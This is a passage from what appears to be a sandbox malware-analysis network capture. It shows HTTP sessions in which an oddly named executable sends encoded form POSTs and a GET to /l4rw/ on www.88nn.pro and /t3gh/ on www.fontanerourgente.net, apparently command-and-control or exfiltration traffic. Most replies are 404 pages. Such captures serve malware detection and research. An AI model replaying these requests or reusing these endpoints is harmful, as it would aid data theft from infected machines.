                                      Data Ascii: itional-info-items ul li { width: 100%; } .info-image { padding: 10px; } .info-heading { font-weight: bold; text-align: left; word-break: break-all;
                                      Aug 26, 2024 18:27:35.087687016 CEST1236INData Raw: 20 61 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 20 6e 6f 6e 65 3b 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 66 6f 6f 74 65 72 20 61 20 69 6d 67 20 7b 0a 20 20 20 20 20 20 20 20 20
                                      Data Ascii: a { text-decoration: none; } footer a img { border: 0; } .copyright { font-size: 10px; color: #3F4143; } @media (min-width: 768px) { .
                                      Aug 26, 2024 18:27:35.087835073 CEST1236INData Raw: 20 31 30 70 78 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 3b
                                      Data Ascii: 10px; } .status-reason { display: inline; } } @media (min-width: 992px) { .additional-info { background-image: url(data:image/png;base64,iVBORw0KG
                                      Aug 26, 2024 18:27:35.087851048 CEST1236INData Raw: 49 46 6c 35 2f 78 61 45 39 61 71 51 47 53 44 36 62 78 49 30 52 5a 53 77 33 75 75 46 30 59 6a 51 48 65 70 6a 4d 78 48 6d 64 39 49 67 43 31 4e 62 59 31 56 53 6b 64 65 42 34 76 58 4d 48 30 4b 53 51 56 49 76 51 66 45 52 63 69 4d 70 63 61 46 74 57 34
                                      Data Ascii: IFl5/xaE9aqQGSD6bxI0RZSw3uuF0YjQHepjMxHmd9IgC1NbY1VSkdeB4vXMH0KSQVIvQfERciMpcaFtW4H8iI0gB2MzfEcV3gB+IkfDtbyCATgtHB7l3TrKUG2yWOe7O2KYQIPE7xFD12Yvy6SvqoLOMf95k+BvgqogCFCx22NdltO1epYc7ycEKSaI9+UAYPGOlKDQYyxDP9Npqv0NKZkS7GuNRQig5pvaYQwdTztjRnCrr/l
                                      Aug 26, 2024 18:27:35.087867022 CEST672INData Raw: 68 56 41 30 37 59 2b 47 57 4e 4d 4f 42 43 78 49 49 70 43 67 43 70 41 58 35 4b 67 48 42 36 49 51 49 4c 48 77 45 33 48 58 6b 32 58 51 56 73 7a 64 53 6b 47 45 43 6a 55 41 42 68 50 4c 4d 64 54 2f 75 4b 4c 30 52 49 51 38 44 7a 59 4f 4b 4a 75 39 38 56
                                      Data Ascii: hVA07Y+GWNMOBCxIIpCgCpAX5KgHB6IQILHwE3HXk2XQVszdSkGECjUABhPLMdT/uKL0RIQ8DzYOKJu98V006LbSIkvBsRlzBPYkIRIH1743iEielBT4iQRkNHwUQMUtTWXqsiQugBiwl73OOrV0RIq/6+BIPPVVLrbAVAulQKIwAO/9jUKyJk51SmO5wwhpHXac0E3EQEfRIu6TfBYLQn/J3eCcFdE7i4dwmHckWErJsmU7eIs
                                      Aug 26, 2024 18:27:35.087883949 CEST1236INData Raw: 47 69 56 6e 39 59 4e 66 38 62 46 42 64 34 52 55 52 46 6c 57 7a 42 76 79 42 45 71 49 69 34 49 39 61 6b 79 2b 32 72 32 39 35 39 37 2f 5a 44 36 32 2b 78 4b 56 66 42 74 4e 4d 36 71 61 48 52 47 36 31 65 72 58 50 42 4f 66 4f 36 48 4e 37 55 59 6c 4a 6d
                                      Data Ascii: GiVn9YNf8bFBd4RURFlWzBvyBEqIi4I9aky+2r29597/ZD62+xKVfBtNM6qaHRG61erXPBOfO6HN7UYlJmuslpWDUTdYab4L2z1v40hPPBvwzqOluTvhDBVB2a4Iyx/4UxLrx8goycW0UEgO4y2L3H+Ul5XI/4voc6rZkA3Bpv3njfS/nhR781E54N6t4OeWxQxuknguJ1S84ARR4RwAqtmaCFZnRiL2lbM+HaAC5npq+IwF+6h
                                      Aug 26, 2024 18:27:35.087913990 CEST261INData Raw: 39 30 30 25 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 2e 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 34 35 30 25 3b 0a
                                      Data Ascii: 900%; } .status-reason { font-size: 450%; } } </style> </head> <body> <div class="container"> <secion class="response-info"> <span clas
                                      Aug 26, 2024 18:27:35.088057041 CEST1236INData Raw: 33 37 0d 0a 34 30 34 3c 2f 73 70 61 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 73 74 61 74 75 73 2d 72 65 61 73 6f 6e 22 3e 0d 0a 38 38 0d 0a 4e 6f 74 20 46 6f 75 6e 64 3c 2f 73 70 61 6e 3e 0a
                                      Data Ascii: 37404</span> <span class="status-reason">88Not Found</span> </section> <section class="contact-info"> Please forward this error screen to 20www.weep.site's <a href="mailto:38
                                      Aug 26, 2024 18:27:35.088231087 CEST730INData Raw: 2d 6c 45 6c 79 68 20 28 70 6f 72 74 20 0d 0a 32 0d 0a 38 30 0d 0a 37 33 0d 0a 29 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                      Data Ascii: -lElyh (port 28073) </div> </li> <li class="info-server">107</li> </ul> </div> </div> </section>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      1192.168.2.44973845.157.69.194805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:27:50.152690887 CEST733OUTPOST /l4rw/ HTTP/1.1
                                      Host: www.88nn.pro
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.88nn.pro
                                      Referer: http://www.88nn.pro/l4rw/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 201
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Raw: 33 4c 39 6c 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 58 6c 74 31 64 50 34 4e 31 76 6e 2b 34 50 68 78 51 46 55 51 31 78 6e 73 58 47 30 59 2b 2b 4a 68 70 42 2b 50 31 4b 4e 47 55 62 71 33 70 56 37 65 72 4e 69 36 68 30 71 4c 74 2b 4f 6b 48 38 33 55 45 6b 30 48 34 38 57 45 30 2b 6b 52 51 53 34 52 56 6e 4e 43 67 36 53 74 36 6f 49 45 4e 32 52 57 4a 5a 52 5a 54 4e 49 7a 38 6e 5a 41 62 4a 63 77 38 59 78 59 51 41 64 70 42 6a 2b 4e 4c 52 42 61 41 43 4e 46 34 75 34 78 43 30 70 4b 70 72 72 78 2f 79 61 58 6b 78 2b 74 49 69 4a 6f 4d 35 73 50 69 44 6b 76 54 46 30 41 36 76 46 72 4f 38 57 78 32 34 43 70 48 77 3d 3d
                                      Data Ascii: 3L9l=UVlwp2aI9JzLXlt1dP4N1vn+4PhxQFUQ1xnsXG0Y++JhpB+P1KNGUbq3pV7erNi6h0qLt+OkH83UEk0H48WE0+kRQS4RVnNCg6St6oIEN2RWJZRZTNIz8nZAbJcw8YxYQAdpBj+NLRBaACNF4u4xC0pKprrx/yaXkx+tIiJoM5sPiDkvTF0A6vFrO8Wx24CpHw==
                                      Aug 26, 2024 18:27:51.031419039 CEST302INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Mon, 26 Aug 2024 16:27:50 GMT
                                      Content-Type: text/html
                                      Content-Length: 138
                                      Connection: close
                                      ETag: "667cd175-8a"
                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      2192.168.2.44973945.157.69.194805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:27:52.688072920 CEST753OUTPOST /l4rw/ HTTP/1.1
                                      Host: www.88nn.pro
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.88nn.pro
                                      Referer: http://www.88nn.pro/l4rw/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 221
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Raw: 33 4c 39 6c 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 56 45 64 31 4f 6f 6b 4e 7a 50 6e 2f 79 76 68 78 47 31 56 58 31 78 6a 73 58 44 45 32 39 4e 39 68 70 67 4f 50 6e 62 4e 47 56 62 71 33 6d 31 36 56 76 4e 69 39 68 30 6d 39 74 37 75 6b 48 38 7a 55 45 6c 6b 48 34 76 4f 48 31 75 6b 70 49 69 34 54 61 48 4e 43 67 36 53 74 36 6f 4e 70 4e 32 70 57 4b 70 68 5a 56 70 55 30 78 48 5a 66 50 5a 63 77 72 49 78 63 51 41 63 45 42 69 7a 46 4c 54 4a 61 41 48 78 46 35 2f 34 79 4d 45 70 4d 6b 4c 71 43 78 52 6e 2b 74 6a 7a 42 47 7a 4e 62 50 4c 41 74 71 6c 31 31 43 30 56 58 6f 76 68 59 54 37 66 46 37 37 2f 67 63 78 76 46 30 73 32 64 5a 79 59 76 4b 38 37 62 54 63 67 67 77 36 59 3d
                                      Data Ascii: 3L9l=UVlwp2aI9JzLVEd1OokNzPn/yvhxG1VX1xjsXDE29N9hpgOPnbNGVbq3m16VvNi9h0m9t7ukH8zUElkH4vOH1ukpIi4TaHNCg6St6oNpN2pWKphZVpU0xHZfPZcwrIxcQAcEBizFLTJaAHxF5/4yMEpMkLqCxRn+tjzBGzNbPLAtql11C0VXovhYT7fF77/gcxvF0s2dZyYvK87bTcggw6Y=
                                      Aug 26, 2024 18:27:53.557790995 CEST302INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Mon, 26 Aug 2024 16:27:53 GMT
                                      Content-Type: text/html
                                      Content-Length: 138
                                      Connection: close
                                      ETag: "667cd175-8a"
                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      3192.168.2.44974045.157.69.194805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:27:55.239108086 CEST10835OUTPOST /l4rw/ HTTP/1.1
                                      Host: www.88nn.pro
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.88nn.pro
                                      Referer: http://www.88nn.pro/l4rw/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 10301
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Raw: 33 4c 39 6c 3d 55 56 6c 77 70 32 61 49 39 4a 7a 4c 56 45 64 31 4f 6f 6b 4e 7a 50 6e 2f 79 76 68 78 47 31 56 58 31 78 6a 73 58 44 45 32 39 4d 46 68 70 53 57 50 31 6f 6c 47 53 62 71 33 76 56 36 57 76 4e 6a 68 68 77 43 68 74 37 71 72 48 2b 37 55 4c 6e 38 48 76 75 4f 48 38 75 6b 70 42 43 34 51 56 6e 4e 54 67 36 43 78 36 70 39 70 4e 32 70 57 4b 72 35 5a 43 74 49 30 69 58 5a 41 62 4a 63 38 38 59 78 30 51 41 55 36 42 69 6e 56 4c 6a 70 61 41 6d 42 46 36 4a 6b 79 4f 6b 70 4f 6e 4c 71 61 78 52 72 6c 74 6a 66 37 47 7a 34 54 50 4b 34 74 6f 67 63 42 59 6c 74 2f 2b 50 70 72 43 4a 2f 31 31 61 54 4e 52 54 66 4a 33 38 4b 52 4e 68 49 6a 4d 4e 62 4c 58 2b 56 6c 69 2f 5a 76 55 43 45 5a 72 6b 38 69 58 31 68 4d 31 4d 38 47 31 52 37 75 32 47 6a 65 6a 4a 53 56 4a 30 71 48 2f 66 38 7a 78 4c 45 54 64 34 57 51 37 68 6d 4c 33 72 6f 69 73 6c 38 71 69 36 76 4d 68 52 59 4b 66 6a 57 49 79 4d 34 41 79 67 2b 5a 2f 2f 48 6b 32 36 6f 4a 39 78 59 65 67 35 5a 4b 77 30 4f 57 70 4b 58 37 59 2b 36 6e 63 37 2b 37 79 42 2f 45 6a 67 72 75 36 [TRUNCATED]
                                      Data Ascii: 3L9l=UVlwp2aI9JzLVEd1OokNzPn/yvhxG1VX1xjsXDE29MFhpSWP1olGSbq3vV6WvNjhhwCht7qrH+7ULn8HvuOH8ukpBC4QVnNTg6Cx6p9pN2pWKr5ZCtI0iXZAbJc88Yx0QAU6BinVLjpaAmBF6JkyOkpOnLqaxRrltjf7Gz4TPK4togcBYlt/+PprCJ/11aTNRTfJ38KRNhIjMNbLX+Vli/ZvUCEZrk8iX1hM1M8G1R7u2GjejJSVJ0qH/f8zxLETd4WQ7hmL3roisl8qi6vMhRYKfjWIyM4Ayg+Z//Hk26oJ9xYeg5ZKw0OWpKX7Y+6nc7+7yB/Ejgru6qgEMrVSywziwRIliYJGyV25SssQTSr3wv1jr9JySfLZDidr8gDueDcKt9rO+Wwi98XNzIo0fejntyQ+zQMtxBc4xSkhtL/9VInugPVo/qYANhZoXCoEuHg/iss78TuQp6m1bveG8yG1Rtxnbxu3MGK5+jXmWIguuW+Z47pEk5z7dJ4p27EG4wbTAVOHj5/Kj1TxwXTWjHDW8JVGGiE8TvxO54wKnp++opGb3kB81tyMEpB5CPbYyMDuoLVo51SdqYUqr79etNleuybvriVimix5WiUaB1jT5jMsHx/pNb7eO+B5dDgE3lFt8u47WqduySZpEKxLShZXKl/aivY9GPh1DxSNdCJvGgOROCauOyBxrUeK+a2HELAdsW2C+XD/5/jpmgczfd9J8ilscoDvlDmx4c7QRAOqDAMQ0NbiV+MEcMqsLy8ccYvcYnfTCAJkHU//E4ELQc5BMm57yEQILFM3TdPON4HdyLmq1XJS99NONDGB+p4ZA7LJcT55yIfOsia4drNCkFi2olZK/0J83BnDqj+1cYilo347W36FWRRPhnt3LKaYKXEBsBnmUfEVqPT9YoWKiLTemWP5RuzLY8ClCTbESvgWVg5Qt3l/C9qXD+/garr7/GEvnda3Lc6ZLY/c2131Z83DB7TpOT7H/wlRIskcAoZUeeV [TRUNCATED]
                                      Aug 26, 2024 18:27:56.331223011 CEST302INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Mon, 26 Aug 2024 16:27:55 GMT
                                      Content-Type: text/html
                                      Content-Length: 138
                                      Connection: close
                                      ETag: "667cd175-8a"
                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      4192.168.2.44974145.157.69.194805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:27:57.778049946 CEST478OUTGET /l4rw/?3L9l=ZXNQqBP58JXIf3luRKwQutCZ8KZdKGRl9UucInMS2YFRqgKt0pQ9Lq2gj3LI6pyb9XKzluqnMvvmNnss5NGj5OwULwtMZgZPw4PUiP5SYTwADLBcTbBMjV4=&kZr0=ht-lElyh HTTP/1.1
                                      Host: www.88nn.pro
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Connection: close
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Aug 26, 2024 18:27:58.639003992 CEST302INHTTP/1.1 404 Not Found
                                      Server: nginx
                                      Date: Mon, 26 Aug 2024 16:27:58 GMT
                                      Content-Type: text/html
                                      Content-Length: 138
                                      Connection: close
                                      ETag: "667cd175-8a"
                                      Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e
                                      Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>


                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                      5192.168.2.44974337.187.158.211805356C:\Program Files (x86)\xgArModzelHSlkpUxkCarqJtNZatcbDPNBWwVGdBePNN\EsAzcOtjoknfjP.exe
                                      TimestampBytes transferredDirectionData
                                      Aug 26, 2024 18:28:04.027951956 CEST769OUTPOST /t3gh/ HTTP/1.1
                                      Host: www.fontanerourgente.net
                                      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                      Accept-Language: en-US,en;q=0.5
                                      Accept-Encoding: gzip, deflate
                                      Origin: http://www.fontanerourgente.net
                                      Referer: http://www.fontanerourgente.net/t3gh/
                                      Cache-Control: max-age=0
                                      Connection: close
                                      Content-Length: 201
                                      Content-Type: application/x-www-form-urlencoded
                                      User-Agent: Mozilla/5.0 (Linux; Android 4.4.2; de-de; SAMSUNG SM-T520 Build/KOT49H) AppleWebKit/537.36 (KHTML, like Gecko) Version/1.5 Chrome/28.0.1500.94 Safari/537.36
                                      Data Raw: 33 4c 39 6c 3d 51 39 77 6e 59 55 52 7a 78 77 6a 6e 6d 69 66 6c 69 44 55 77 78 65 54 72 47 70 69 62 78 67 63 58 61 38 6e 65 53 49 35 57 6d 44 6c 54 4d 30 77 50 55 78 67 4a 66 4c 72 69 35 43 74 77 4b 69 30 37 73 4b 7a 4d 6c 39 7a 31 43 55 61 32 62 4a 4a 4b 57 2b 31 6e 70 53 56 33 2b 79 44 6b 34 49 6e 66 74 6d 5a 2f 70 62 78 66 79 4a 72 72 6f 71 62 46 5a 70 65 62 59 36 34 4c 69 4b 71 57 44 54 50 56 4a 73 58 64 52 4e 33 66 42 66 70 79 6c 35 66 42 35 54 36 47 47 39 6b 6b 31 39 6f 74 74 57 4f 6c 75 6e 79 6f 39 7a 44 33 6c 38 46 62 43 4e 67 71 70 6a 5a 6c 42 35 65 39 46 34 51 31 30 7a 52 52 31 77 3d 3d
                                      Data Ascii: 3L9l=Q9wnYURzxwjnmifliDUwxeTrGpibxgcXa8neSI5WmDlTM0wPUxgJfLri5CtwKi07sKzMl9z1CUa2bJJKW+1npSV3+yDk4InftmZ/pbxfyJrroqbFZpebY64LiKqWDTPVJsXdRN3fBfpyl5fB5T6GG9kk19ottWOlunyo9zD3l8FbCNgqpjZlB5e9F4Q10zRR1w==
                                      Aug 26, 2024 18:28:04.901597023 CEST1236INHTTP/1.1 404 Not Found
                                      Date: Mon, 26 Aug 2024 16:28:04 GMT
                                      Server: Apache
                                      Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                      Cache-Control: no-cache, must-revalidate, max-age=0
                                      Link: <https://mgmasistencia.com/wp-json/>; rel="https://api.w.org/"
                                      Connection: close
                                      Transfer-Encoding: chunked
                                      Content-Type: text/html; charset=UTF-8
                                      Data Raw: 31 63 65 32 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 73 22 20 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a 09 3c 74 69 74 6c 65 3e 50 c3 a1 67 69 6e 61 20 6e 6f 20 65 6e 63 6f 6e 74 72 61 64 61 20 26 23 38 32 31 31 3b 20 4d 47 4d 20 41 73 69 73 74 65 6e 63 69 61 3c 2f 74 69 74 6c 65 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 64 6e 73 2d 70 72 65 66 65 74 63 68 27 20 68 72 65 66 3d 27 2f 2f 6d 67 6d 61 73 69 73 74 65 6e 63 69 61 2e 63 6f 6d 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 [TRUNCATED]
                                      Data Ascii: 1ce2<!doctype html><html lang="es" ><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" /><title>Pgina no encontrada &#8211; MGM Asistencia</title><meta name='robots' content='max-image-preview:large' /><link rel='dns-prefetch' href='//mgmasistencia.com' /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed" href="https://mgmasistencia.com/feed/" /><link rel="alternate" type="application/rss+xml" title="MGM Asistencia &raquo; Feed de los comentarios" href="https://mgmasistencia.com/comments/feed/" /><script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/mgmasistencia.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.6.1"}};/
                                      Aug 26, 2024 18:28:04.901612043 CEST1236INData Raw: 2a 21 20 54 68 69 73 20 66 69 6c 65 20 69 73 20 61 75 74 6f 2d 67 65 6e 65 72 61 74 65 64 20 2a 2f 0a 21 66 75 6e 63 74 69 6f 6e 28 69 2c 6e 29 7b 76 61 72 20 6f 2c 73 2c 65 3b 66 75 6e 63 74 69 6f 6e 20 63 28 65 29 7b 74 72 79 7b 76 61 72 20 74
                                      Data Ascii: *! This file is auto-generated */!function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas
                                      Aug 26, 2024 18:28:04.901621103 CEST448INData Raw: 29 2c 6f 3d 28 61 2e 74 65 78 74 42 61 73 65 6c 69 6e 65 3d 22 74 6f 70 22 2c 61 2e 66 6f 6e 74 3d 22 36 30 30 20 33 32 70 78 20 41 72 69 61 6c 22 2c 7b 7d 29 3b 72 65 74 75 72 6e 20 65 2e 66 6f 72 45 61 63 68 28 66 75 6e 63 74 69 6f 6e 28 65 29
                                      Data Ascii: ),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupport
                                      Aug 26, 2024 18:28:04.901727915 CEST1236INData Raw: 4f 4e 2e 70 61 72 73 65 28 73 65 73 73 69 6f 6e 53 74 6f 72 61 67 65 2e 67 65 74 49 74 65 6d 28 6f 29 29 3b 69 66 28 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 26 26 22 6e 75 6d 62 65 72 22 3d 3d 74 79 70 65 6f 66 20 65 2e 74 69 6d 65
                                      Data Ascii: ON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Work
                                      Aug 26, 2024 18:28:04.901740074 CEST1236INData Raw: 74 74 69 6e 67 73 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 74 79 6c 65 20 69 64 3d 27 77 70 2d 65 6d 6f 6a 69 2d 73 74 79 6c 65 73 2d 69 6e 6c 69 6e 65 2d 63 73 73 27 3e 0a 0a 09 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 20 69 6d 67 2e 65 6d
                                      Data Ascii: ttings);</script><style id='wp-emoji-styles-inline-css'>img.wp-smiley, img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 0.07
                                      Aug 26, 2024 18:28:04.901748896 CEST1236INData Raw: 6e 74 65 72 7d 2e 69 73 2d 64 61 72 6b 2d 74 68 65 6d 65 20 3a 72 6f 6f 74 20 3a 77 68 65 72 65 28 2e 77 70 2d 62 6c 6f 63 6b 2d 69 6d 61 67 65 20 66 69 67 63 61 70 74 69 6f 6e 29 7b 63 6f 6c 6f 72 3a 23 66 66 66 66 66 66 61 36 7d 2e 77 70 2d 62
                                      Data Ascii: nter}.is-dark-theme :root :where(.wp-block-image figcaption){color:#ffffffa6}.wp-block-image{margin:0 0 1em}.wp-block-pullquote{border-bottom:4px solid;border-top:4px solid;color:currentColor;margin-bottom:1.75em}.wp-block-pullquote cite,.wp-b
                                      Aug 26, 2024 18:28:04.901756048 CEST1236INData Raw: 65 70 61 72 61 74 6f 72 3a 6e 6f 74 28 2e 69 73 2d 73 74 79 6c 65 2d 77 69 64 65 29 3a 6e 6f 74 28 2e 69 73 2d 73 74 79 6c 65 2d 64 6f 74 73 29 7b 77 69 64 74 68 3a 31 30 30 70 78 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 65 70 61 72 61 74 6f 72 2e 68
